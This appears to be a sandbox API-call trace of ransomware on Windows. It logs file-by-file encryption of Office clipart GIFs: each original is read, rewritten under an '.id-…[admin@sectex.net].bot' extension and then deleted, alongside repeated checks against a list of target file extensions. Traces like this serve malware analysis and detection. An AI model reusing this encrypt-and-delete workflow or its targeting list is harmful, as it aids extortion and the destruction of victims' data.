	[0053.310] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0053.310] GetLastError () returned 0x0
	[0053.310] ReadFile (in: hFile=0x188, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0xcb3, lpOverlapped=0x0) returned 1
	[0053.313] WriteFile (in: hFile=0x1f4, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xcc0, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xcc0, lpOverlapped=0x0) returned 1
	[0053.314] ReadFile (in: hFile=0x188, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0053.314] WriteFile (in: hFile=0x1f4, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0053.314] SetEndOfFile (hFile=0x1f4) returned 1
	[0053.314] CloseHandle (hObject=0x1f4) returned 1
	[0053.314] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.314] SetEndOfFile (hFile=0x188) returned 1
	[0053.315] CloseHandle (hObject=0x188) returned 1
	[0053.315] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0053.315] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif")) returned 1
	[0053.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63
	[0053.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63
	[0053.316] lstrlenW (lpString=".doc") returned 4
	[0053.316] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0053.316] lstrlenW (lpString=".docx") returned 5
	[0053.316] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0053.316] lstrlenW (lpString=".pdf") returned 4
	[0053.316] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0053.316] lstrlenW (lpString=".xls") returned 4
	[0053.316] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0053.316] lstrlenW (lpString=".xlsx") returned 5
	[0053.316] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0053.316] lstrlenW (lpString=".ppt") returned 4
	[0053.316] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0053.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63
	[0053.316] lstrlenW (lpString=".zip") returned 4
	[0053.316] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0053.316] lstrlenW (lpString=".rar") returned 4
	[0053.316] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0053.316] lstrlenW (lpString=".bz2") returned 4
	[0053.316] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0053.316] lstrlenW (lpString=".7z") returned 3
	[0053.316] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0053.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63
	[0053.316] lstrlenW (lpString=".dbf") returned 4
	[0053.316] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0053.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63
	[0053.316] lstrlenW (lpString=".1cd") returned 4
	[0053.316] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0053.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63
	[0053.316] lstrlenW (lpString=".jpg") returned 4
	[0053.316] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0053.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63
	[0053.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63
	[0053.316] lstrlenW (lpString=".doc") returned 4
	[0053.317] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0053.317] lstrlenW (lpString=".docx") returned 5
	[0053.317] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0053.317] lstrlenW (lpString=".pdf") returned 4
	[0053.317] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0053.317] lstrlenW (lpString=".xls") returned 4
	[0053.317] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0053.317] lstrlenW (lpString=".xlsx") returned 5
	[0053.317] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0053.317] lstrlenW (lpString=".ppt") returned 4
	[0053.317] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0053.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63
	[0053.317] lstrlenW (lpString=".zip") returned 4
	[0053.317] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0053.317] lstrlenW (lpString=".rar") returned 4
	[0053.317] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0053.317] lstrlenW (lpString=".bz2") returned 4
	[0053.317] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0053.317] lstrlenW (lpString=".7z") returned 3
	[0053.317] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0053.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63
	[0053.317] lstrlenW (lpString=".dbf") returned 4
	[0053.317] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0053.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63
	[0053.317] lstrlenW (lpString=".1cd") returned 4
	[0053.317] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0053.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63
	[0053.317] lstrlenW (lpString=".jpg") returned 4
	[0053.317] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0053.317] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0053.317] lstrlenW (lpString="AG00040_.GIF") returned 12
	[0053.318] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0053.318] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=8097) returned 1
	[0053.318] CloseHandle (hObject=0x188) returned 1
	[0053.318] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif")) returned 0x20
	[0053.318] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0053.318] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0053.318] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.318] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.318] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0053.319] GetLastError () returned 0x0
	[0053.319] ReadFile (in: hFile=0x188, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x1fa1, lpOverlapped=0x0) returned 1
	[0053.322] WriteFile (in: hFile=0x1f4, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x1fb0, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x1fb0, lpOverlapped=0x0) returned 1
	[0053.323] ReadFile (in: hFile=0x188, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0053.323] WriteFile (in: hFile=0x1f4, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0053.323] SetEndOfFile (hFile=0x1f4) returned 1
	[0053.323] CloseHandle (hObject=0x1f4) returned 1
	[0053.323] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.323] SetEndOfFile (hFile=0x188) returned 1
	[0053.324] CloseHandle (hObject=0x188) returned 1
	[0053.324] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0053.324] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif")) returned 1
	[0053.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63
	[0053.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63
	[0053.324] lstrlenW (lpString=".doc") returned 4
	[0053.324] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0053.324] lstrlenW (lpString=".docx") returned 5
	[0053.324] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0053.325] lstrlenW (lpString=".pdf") returned 4
	[0053.325] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0053.325] lstrlenW (lpString=".xls") returned 4
	[0053.325] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0053.325] lstrlenW (lpString=".xlsx") returned 5
	[0053.325] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0053.325] lstrlenW (lpString=".ppt") returned 4
	[0053.325] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0053.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63
	[0053.325] lstrlenW (lpString=".zip") returned 4
	[0053.325] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0053.325] lstrlenW (lpString=".rar") returned 4
	[0053.325] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0053.325] lstrlenW (lpString=".bz2") returned 4
	[0053.325] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0053.325] lstrlenW (lpString=".7z") returned 3
	[0053.325] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0053.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63
	[0053.325] lstrlenW (lpString=".dbf") returned 4
	[0053.325] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0053.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63
	[0053.325] lstrlenW (lpString=".1cd") returned 4
	[0053.325] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0053.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63
	[0053.325] lstrlenW (lpString=".jpg") returned 4
	[0053.325] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0053.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63
	[0053.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63
	[0053.325] lstrlenW (lpString=".doc") returned 4
	[0053.325] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0053.325] lstrlenW (lpString=".docx") returned 5
	[0053.325] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0053.325] lstrlenW (lpString=".pdf") returned 4
	[0053.325] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0053.326] lstrlenW (lpString=".xls") returned 4
	[0053.326] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0053.326] lstrlenW (lpString=".xlsx") returned 5
	[0053.326] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0053.326] lstrlenW (lpString=".ppt") returned 4
	[0053.326] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0053.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63
	[0053.326] lstrlenW (lpString=".zip") returned 4
	[0053.326] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0053.326] lstrlenW (lpString=".rar") returned 4
	[0053.326] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0053.326] lstrlenW (lpString=".bz2") returned 4
	[0053.326] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0053.326] lstrlenW (lpString=".7z") returned 3
	[0053.326] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0053.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63
	[0053.326] lstrlenW (lpString=".dbf") returned 4
	[0053.326] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0053.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63
	[0053.326] lstrlenW (lpString=".1cd") returned 4
	[0053.326] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0053.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63
	[0053.326] lstrlenW (lpString=".jpg") returned 4
	[0053.326] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0053.326] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0053.326] lstrlenW (lpString="AG00052_.GIF") returned 12
	[0053.326] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00052_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0053.327] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=7686) returned 1
	[0053.327] CloseHandle (hObject=0x188) returned 1
	[0053.327] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00052_.gif")) returned 0x20
	[0053.327] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00052_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0053.327] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00052_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0053.327] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.327] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.327] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00052_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0053.328] GetLastError () returned 0x0
	[0053.328] ReadFile (in: hFile=0x188, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x1e06, lpOverlapped=0x0) returned 1
	[0053.332] WriteFile (in: hFile=0x1f4, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x1e10, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x1e10, lpOverlapped=0x0) returned 1
	[0053.333] ReadFile (in: hFile=0x188, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0053.333] WriteFile (in: hFile=0x1f4, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0053.333] SetEndOfFile (hFile=0x1f4) returned 1
	[0053.333] CloseHandle (hObject=0x1f4) returned 1
	[0053.333] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.333] SetEndOfFile (hFile=0x188) returned 1
	[0053.334] CloseHandle (hObject=0x188) returned 1
	[0053.334] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0053.334] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00052_.gif")) returned 1
	[0053.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63
	[0053.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63
	[0053.334] lstrlenW (lpString=".doc") returned 4
	[0053.334] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0053.334] lstrlenW (lpString=".docx") returned 5
	[0053.334] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0053.334] lstrlenW (lpString=".pdf") returned 4
	[0053.334] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0053.334] lstrlenW (lpString=".xls") returned 4
	[0053.334] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0053.335] lstrlenW (lpString=".xlsx") returned 5
	[0053.335] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0053.335] lstrlenW (lpString=".ppt") returned 4
	[0053.335] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0053.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63
	[0053.335] lstrlenW (lpString=".zip") returned 4
	[0053.335] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0053.335] lstrlenW (lpString=".rar") returned 4
	[0053.335] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0053.335] lstrlenW (lpString=".bz2") returned 4
	[0053.335] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0053.335] lstrlenW (lpString=".7z") returned 3
	[0053.335] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0053.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63
	[0053.335] lstrlenW (lpString=".dbf") returned 4
	[0053.335] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0053.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63
	[0053.335] lstrlenW (lpString=".1cd") returned 4
	[0053.335] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0053.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63
	[0053.335] lstrlenW (lpString=".jpg") returned 4
	[0053.335] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0053.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63
	[0053.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63
	[0053.335] lstrlenW (lpString=".doc") returned 4
	[0053.335] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0053.335] lstrlenW (lpString=".docx") returned 5
	[0053.335] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0053.335] lstrlenW (lpString=".pdf") returned 4
	[0053.335] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0053.335] lstrlenW (lpString=".xls") returned 4
	[0053.335] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0053.335] lstrlenW (lpString=".xlsx") returned 5
	[0053.335] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0053.335] lstrlenW (lpString=".ppt") returned 4
	[0053.336] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0053.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63
	[0053.336] lstrlenW (lpString=".zip") returned 4
	[0053.336] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0053.336] lstrlenW (lpString=".rar") returned 4
	[0053.336] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0053.336] lstrlenW (lpString=".bz2") returned 4
	[0053.336] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0053.336] lstrlenW (lpString=".7z") returned 3
	[0053.336] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0053.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63
	[0053.336] lstrlenW (lpString=".dbf") returned 4
	[0053.336] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0053.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63
	[0053.336] lstrlenW (lpString=".1cd") returned 4
	[0053.336] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0053.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63
	[0053.336] lstrlenW (lpString=".jpg") returned 4
	[0053.336] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0053.336] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0053.336] lstrlenW (lpString="AG00057_.GIF") returned 12
	[0053.336] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0053.336] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=11891) returned 1
	[0053.336] CloseHandle (hObject=0x188) returned 1
	[0053.337] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif")) returned 0x20
	[0053.337] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0053.337] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0053.337] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.337] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.337] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0053.337] GetLastError () returned 0x0
